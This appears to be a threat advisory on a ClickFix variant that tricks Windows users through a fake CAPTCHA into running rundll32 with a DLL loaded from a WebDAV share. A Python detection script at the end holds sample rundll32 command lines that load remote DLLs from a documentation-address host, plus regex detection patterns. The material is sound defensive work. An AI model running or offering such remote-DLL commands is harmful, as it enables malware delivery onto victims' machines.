A newly discovered variant of the ClickFix attack technique is actively targeting Windows users by abusing built-in system components to evade detection. Instead of relying on PowerShell or mshta, the attack leverages rundll32.exe and WebDAV to quietly deliver malicious payloads.
This change significantly reduces visibility for security tools focused on script-based threat detection.
Social Engineering Entry Point
The attack begins with a fake CAPTCHA verification page designed to trick users into executing commands manually.
Victims are instructed to:
- Press Win + R to open the Run dialog
- Paste a command that the page has already copied to the clipboard
- Press Enter to execute it
Because the instructions appear harmless, users unknowingly initiate the attack themselves.
Abuse of Native Windows Components
This variant avoids common scripting engines and instead uses trusted Windows utilities.
The malicious chain:
- Executes rundll32.exe
- Connects to a remote WebDAV share
- Loads the malicious DLL from that share
- Calls an export function by ordinal rather than by name
Calling exports by ordinal keeps the function name out of the command line, adding a further layer of obfuscation.
WebDAV-Based Payload Delivery
WebDAV allows remote files to be accessed as network resources.
The attacker uses this capability to:
- Host the malicious DLL externally
- Load the payload directly into memory
- Avoid writing files to disk
- Reduce the detection footprint
This approach enables stealthy initial access.
Multi-Stage In-Memory Execution
After initial execution, the attack transitions to a multi-stage chain.
Later stages:
- Invoke PowerShell quietly
- Deliver payloads in memory
- Download additional components
- Avoid leaving filesystem artifacts
This technique minimizes forensic evidence.
Secondary Payload Capabilities
The attack deploys a loader that:
- Resolves API calls dynamically at runtime
- Avoids static imports
- Uses API hashing to obscure which functions it resolves
- Performs sandbox detection
- Implements anti-debugging checks
These techniques complicate analysis and detection.
Process Injection for Persistence
Telemetry indicates code injection into legitimate applications.
Observed behaviors include:
- Memory injection into browser processes
- Hidden execution within trusted applications
- Persistence through process hijacking
- Fewer behavioral anomalies for defenders to key on
This helps the malware remain concealed.
Detection Challenges
Because the attack uses legitimate tools, early detection is difficult.
Security teams may miss:
- Anomalous rundll32 execution
- Abuse of WebDAV traffic
- In-memory payload delivery
- Activity that leaves only minimal disk artifacts
Traditional script-based detection rules may not trigger at all, because no PowerShell or mshta invocation appears in the first stage.
Defensive Recommendations
Organizations should:
- Monitor rundll32 command-line usage
- Audit living-off-the-land binary (LOLBin) activity
- Restrict unnecessary WebDAV traffic
- Block suspicious outbound connections
- Enable process command-line logging
- Enhance user awareness training
These steps improve detection.
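As an added illustration of the first and fifth recommendations (not code from the article or from any vendor), the following script triages process-creation records for the rundll32 behaviours described above: a DLL argument pointing at a remote UNC or WebDAV-style share and an export called by ordinal. The event records and the 203.0.113.10 address are constructed for the example.

```python
import re

# Constructed sample process-creation records (not real telemetry): one benign
# rundll32 launch and two that fit the rundll32 -> WebDAV -> ordinal chain
# described above. 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\203.0.113.10@80\DavWWWRoot\update.dll,#1",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\203.0.113.10@SSL@443\dav\lib.dll,#2",
     "parent": r"C:\Windows\explorer.exe"},
]

# A DLL argument given as a UNC path (\\host\...), the WebDAV host@port form
# (\\host@80\... or \\host@SSL@443\...), and an export named by ordinal (#N).
UNC_DLL = re.compile(r"\\\\[^\s\\]+\\", re.I)
WEBDAV_UNC = re.compile(r"\\\\[^\s\\]+@(?:ssl@)?\d+\\", re.I)
ORDINAL_EXPORT = re.compile(r"\.dll\s*,\s*#\d+", re.I)

def score_rundll32(event):
    """Return the reasons a rundll32 launch resembles the chain above
    (an empty list means nothing suspicious under these rules)."""
    if not event["image"].lower().endswith(r"\rundll32.exe"):
        return []
    cmd, reasons = event["cmdline"], []
    if WEBDAV_UNC.search(cmd):
        reasons.append("DLL path is a WebDAV-style UNC (host@port)")
    elif UNC_DLL.search(cmd):
        reasons.append("DLL loaded from a remote UNC share")
    if ORDINAL_EXPORT.search(cmd):
        reasons.append("export called by ordinal (#N) instead of by name")
    # Win+R launches come from explorer.exe; add it as context, not as a reason.
    if reasons and event["parent"].lower().endswith(r"\explorer.exe"):
        reasons.append("parent is explorer.exe (Run dialog style launch)")
    return reasons

def triage(events):
    """Map each suspicious command line to the reasons it was flagged."""
    hits = {}
    for event in events:
        reasons = score_rundll32(event)
        if reasons:
            hits[event["cmdline"]] = reasons
    return hits
```

Running triage(SAMPLE_EVENTS) flags only the two remote-share launches; the local shell32.dll call with a named export is left alone, which is the allowlisting behaviour a production rule also needs.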
Conclusion
This ClickFix variant demonstrates a shift toward living-off-the-land techniques that rely on trusted Windows components. By combining social engineering, WebDAV payload delivery, and in-memory execution, attackers significantly reduce detection opportunities. Organizations should update monitoring strategies to include native tool abuse and user-driven execution scenarios.